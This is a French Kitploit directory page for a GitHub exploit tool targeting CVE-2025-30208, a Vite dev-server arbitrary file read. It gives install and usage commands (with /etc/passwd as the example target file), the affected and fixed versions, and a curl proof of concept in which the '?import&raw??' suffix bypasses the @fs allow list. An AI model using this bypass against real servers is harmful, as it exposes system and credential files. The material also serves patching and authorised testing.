Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30208 — Cet exploit est uniquement destiné à des fins éducatives et de tests de sécurité éthiques. L'utilisation de cet exploit contre des cibles sans consentement préalable mutuel est illégale, et le développeur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet exploit. | Kitploit
Outils/GitHubGitHub/on1onss/cve-2025-30208
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubon1onss/cve-2025-30208

CVE-2025-30208

Voir le dépôt
4il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Cet exploit est uniquement destiné à des fins éducatives et de tests de sécurité éthiques. L'utilisation de cet exploit contre des cibles sans consentement préalable mutuel est illégale, et le développeur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet exploit.

Partager

CVE-2025-30208

[!IMPORTANT]

Avertissement

Cet exploit est destiné uniquement à des fins éducatives et de tests de sécurité éthiques. L'utilisation de cet exploit contre des cibles sans consentement mutuel préalable est illégale, et le développeur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet exploit.

Installation

root@kitploit:~
git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

Utilisation

root@kitploit:~
python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

options:
  -h, --help       show this help message and exit
  -t <Target URL>  Example: -t http://localhost:5173/
  -fp <File Path>  Example: -fp /etc/passwd
  -i               Interactive mode

Description

Versions affectées

root@kitploit:~
>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

Versions corrigées

root@kitploit:~
6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

Résumé

Le contenu de fichiers arbitraires peut être renvoyé au navigateur.

Impact

Seules les applications exposant explicitement le serveur de développement Vite au réseau (en utilisant l'option de configuration --host ou server.host) sont concernées.

Détails

@fs refuse l'accès aux fichiers en dehors de la liste d'autorisation de Vite. L'ajout de ?raw?? ou ?import&raw?? à l'URL contourne cette limitation et renvoie le contenu du fichier s'il existe. Cette faille existe car les séparateurs de fin tels que ? sont supprimés à plusieurs endroits, mais ne sont pas pris en compte dans les expressions régulières de la chaîne de requête.

PoC

root@kitploit:~
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
Télécharger l’outil